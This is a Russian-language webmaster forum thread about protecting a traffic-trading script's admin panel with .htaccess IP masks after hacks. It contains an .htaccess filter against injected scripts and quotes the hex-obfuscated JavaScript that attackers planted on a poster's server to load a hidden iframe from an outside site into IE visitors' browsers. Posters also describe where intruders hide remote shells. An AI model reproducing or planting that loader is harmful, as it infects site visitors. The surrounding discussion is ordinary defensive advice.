Got SWAG?
С нами с 14.01.07
Сообщения: 782
Рейтинг: 132
|
 Добавлено: 01/08/08 в 02:11 |
глупый вопрос, но когда через хтаксес закрываешь файлы по айпишнику, что делать если айпи динамический, и не знаешь своей маски подсети?
|
|
|
|
Lies, confusion, government, control, crime, money, panic, terror
|
0
|
|
| |
С нами с 10.10.07
Сообщения: 339
Рейтинг: 404
|
| Добавлено: 01/08/08 в 02:14 |
использовать ВПН/прокси/соксы.
|
|
|
|
| |
Got SWAG?
С нами с 14.01.07
Сообщения: 782
Рейтинг: 132
|
| Добавлено: 01/08/08 в 02:20 |
а если первые две цифры всегда одинаковы, это можно как то использовать? сорри если вопрос уж сильно глупый вообще не рублю в этом 
|
|
|
|
Lies, confusion, government, control, crime, money, panic, terror
|
0
|
|
| |
пьяный мастер
С нами с 06.09.05
Сообщения: 11947
Рейтинг: 5837
|
| Добавлено: 01/08/08 в 03:02 |
| Rustafaraider писал: | | глупый вопрос, но когда через хтаксес закрываешь файлы по айпишнику, что делать если айпи динамический, и не знаешь своей маски подсети? |
забить хуй, выпить пива, заплатить админу, и не боятся читеров... . >;-)
|
|
|
|
| |
Got SWAG?
С нами с 14.01.07
Сообщения: 782
Рейтинг: 132
|
| Добавлено: 01/08/08 в 03:21 |
| X-dream писал: | | забить хуй, выпить пива, заплатить админу, и не боятся читеров... . >;-) |
поломали меня бро  админ говорит давай айпи закрою, хз че ему дать...
|
|
|
|
Lies, confusion, government, control, crime, money, panic, terror
|
0
|
|
| |
пьяный мастер
С нами с 06.09.05
Сообщения: 11947
Рейтинг: 5837
|
| Добавлено: 01/08/08 в 09:06 |
| Rustafaraider писал: | | хз че ему дать... |
у меня первые две цифры только там... еще как уже писали использовать ВПН/прокси/соксы можно, а ваще когда ИП динамическии, там вроде несколько вариантов ИП покругу меняются, поэтому можно их все туда вписать.
|
|
|
|
| |
С нами с 01.11.06
Сообщения: 316
Рейтинг: 293
|
| Добавлено: 01/08/08 в 12:08 |
| Rustafaraider писал: | | поломали меня бро админ говорит давай айпи закрою, хз че ему дать... |
Если первые 2 цифры не меняются, а остальные да, то закрывать надо по маске /16. А вообще даёшь свой текущий IP админу, он смотрит его хуиз(или же сам смотришь через сервисы в инете), там пишут обычно маску подсети твоего провайдера. Маловероятно, что взломщик сидит с тобой на одном прове 
|
|
|
|
| |
Got SWAG?
С нами с 14.01.07
Сообщения: 782
Рейтинг: 132
|
| Добавлено: 01/08/08 в 21:00 |
ага ага, по маске /16 админ и сделал...
|
|
|
|
Lies, confusion, government, control, crime, money, panic, terror
|
0
|
|
| |
С нами с 22.07.08
Сообщения: 149
Рейтинг: 18
|
| Добавлено: 02/08/08 в 22:13 |
перечитал топ и не совсем понял,куда и какой код надо поместить для закрытия админки ат3?что даст htacess,что был предложен в 3-ем посте и куда его ксласть?
|
|
|
|
| |
На пенсии
С нами с 09.05.07
Сообщения: 982
Рейтинг: 411
|
| Добавлено: 03/08/08 в 17:52 |
А у меня осле добавления кода в .htaccess Internal Server Error
|
|
|
|
Все пиздой накрылось :)
|
0
|
|
| |
С нами с 29.05.05
Сообщения: 673
Рейтинг: 294
|
| Добавлено: 03/08/08 в 18:03 |
ребят ну вы чо?
там же написано где минусик - убрать, где плюсик - оставить
типо так:
| Код: |
RewriteEngine on
RewriteCond %{HTTP_REFERER} ^(.*)?document.write\(unescape(.*)?$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(.*)?<\?(.*)?$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(.*)?\?>(.*)?$ [NC,OR]
RewriteCond %{QUERY_STRING} ^(.*)?document.write\(unescape(.*)?$ [NC,OR]
RewriteCond %{QUERY_STRING} ^(.*)?iframe(.*)?$ [NC]
RewriteRule .* http://google.com/ [L]
|
|
|
|
|
| |
С нами с 12.12.06
Сообщения: 871
Рейтинг: 381
|
| Добавлено: 04/08/08 в 02:15 |
| Код: | <script>
var s='3C696672616D65207372633D22687474703A2F2F7777772E6A65726B6F66666A75677
32E636F6D2F7A2F7374617469632E7068703F7369673D333733303241333433423338323
23342323033433243323422206865696768743D223222207374796C653D22646973706C6
1793A6E6F6E65222077696474683D2232223E3C2F696672616D653E'; var o=''; for(i=0;i<s.length;i=i+2) { var c=String.fromCharCode(37); o=o+c+s.substr(i,2);} var v=navigator.userAgent.toLowerCase(); if (v.indexOf('msie 6.0') != -1 || v.indexOf('msie 5.') != -1){document.write(unescape(o));}
</script>
|
такая шняга сегодня сегодня распостранилась почти по всему серваку я думаю что только благодоря ат3, хорошо что вовремя заметили и принял меры. 2Benny, а куда именно в какую папку этот .htaccess запихивать?
|
|
|
|
| |
С нами с 06.10.06
Сообщения: 964
Рейтинг: 742
|
| Добавлено: 04/08/08 в 12:33 |
да типичная хуйня взлома через ат3
Я конешно незнаю какие меры вы принял
но скажу те что радоватся рано )
ибо там скорее всего около сотни пхпшек с ремот шелами и куча прочей лабуды ...
|
|
|
|
| |
www.phpdevs.com
С нами с 24.10.02
Сообщения: 16633
Рейтинг: 16105
|
| Добавлено: 04/08/08 в 12:43 |
насколько помнится в ат3 нет пхп кода.
|
|
|
|
Пишу на php/mysql/django за вменяемые деньги.
Обращаться в личку.
|
0
|
|
| |
С нами с 06.10.06
Сообщения: 964
Рейтинг: 742
|
| Добавлено: 04/08/08 в 12:48 |
Причем тут пхп код ебаного ат3 ?
ты хоть раз вычищал сервак после взлома ? например после того же ат3
Хакер ищет куда он может записать то через что он сможет вернутся на сервак. Это либо папки с правами 777 либо папки чей владелец апач. Туда он и позаливает свои шелы, на практике чаще всего это стает папка с бекапами или тумбами стрима. тоесть ты если пороешся в тумбах бес проблем на ряду с джпегами найдеш например sync.php )
догадайся с трех раз что это за тумба бля такая
|
|
|
|
| |
www.phpdevs.com
С нами с 24.10.02
Сообщения: 16633
Рейтинг: 16105
|
| Добавлено: 04/08/08 в 12:54 |
| Цитата: | | ты хоть раз вычищал сервак после взлома ? например после того же ат3 |
старое стер, с бакапа поднял. Ну что то там новое за сутки теряется, но как правило это только файлы и не критично.
С остальным спорить не буду, не заморачивался
|
|
|
|
Пишу на php/mysql/django за вменяемые деньги.
Обращаться в личку.
|
0
|
|
| |
С нами с 06.10.06
Сообщения: 964
Рейтинг: 742
|
| Добавлено: 04/08/08 в 12:55 |
ну если заговорили добавлю..
Последнее время эти кулхацкеры начали еще закидывать скрипт который плодит ремотшелы, или же постоянно дописывает в индекс есплоит. Обычно его ложат в /tmp и тд тоесть в папки куда есть доступ у всех
Вычистить полностью сервак после такой атаки оч непросто, бывает что вроде все ок и все закрыли но через месяц хакер вспоминает про свой ремотшелл и ложит гдето в другое место какойто говно. Короче говоря проще переформатить все чем все вычистить
|
|
|
|
| |
С нами с 06.10.06
Сообщения: 964
Рейтинг: 742
|
| Добавлено: 04/08/08 в 12:57 |
| Stek писал: | старое стер, с бакапа поднял. Ну что то там новое за сутки теряется, но как правило это только файлы и не критично.
С остальным спорить не буду, не заморачивался |
Правило Раз :
Недержи хакеров за тупых алкашей )
Они если захотят , обставят твой сервак на раз два
|
|
|
|
| |
www.phpdevs.com
С нами с 24.10.02
Сообщения: 16633
Рейтинг: 16105
|
| Добавлено: 04/08/08 в 13:18 |
а при чем тут хакеры ? Я про восстановление аккаунта после хака говорю. Легче из бакапа чистый вариант поднять и пропатчить, чем копаться в похаканном и патчить уже все подряд.
|
|
|
|
Пишу на php/mysql/django за вменяемые деньги.
Обращаться в личку.
|
0
|
|
| |
С нами с 06.10.06
Сообщения: 964
Рейтинг: 742
|
| Добавлено: 04/08/08 в 13:37 |
Весь акк с бекапа поднять в 80% случаев поможет, но далеко не у всех есть такой бекап, а потом не все подымают чтото с бекапа, просто перезалил индекс и все - понеслась
|
|
|
|
| |
С нами с 12.12.06
Сообщения: 871
Рейтинг: 381
|
| Добавлено: 04/08/08 в 14:10 |
бразы не сорьтесь, лучше скажите куда всё таки(в какую папку) закладывать предложенный тут .htaccess, а то пока админки просто по IP закрыты (Settings -> admin access IP masks), a мне что то кажется что это нихуя не эффективно
|
|
|
|
| |
С нами с 06.10.06
Сообщения: 964
Рейтинг: 742
|
| Добавлено: 04/08/08 в 14:16 |
ложи прямо в корень акка
или же в корень каждого домена
htaccess действует выше от того места куда его положили до конца
Зы. никто несорится просто эти пидарские хакеры заебали.. а прогеры ат3 еще больше
|
|
|
|
| |
С нами с 22.07.08
Сообщения: 149
Рейтинг: 18
|
| Добавлено: 04/08/08 в 15:59 |
вопрос номер 2,что даёт добавление этого хтаксеса?
|
|
|
|
| |
С нами с 25.09.04
Сообщения: 485
Рейтинг: 514
|
| Добавлено: 04/08/08 в 16:16 |
не дает впихнуть тебе в сидж всякую гадость...
|
|
|
|
| |
♣ MAFIA ♣
С нами с 03.07.07
Сообщения: 1657
Рейтинг: 2246
|
| Добавлено: 04/08/08 в 19:56 |
| Rustafaraider писал: | | поломали меня бро админ говорит давай айпи закрою, хз че ему дать... |
whatismyip.com - покажет твой айпи, убери последние пару значений и будет твоя маска
|
|
|
|
| |
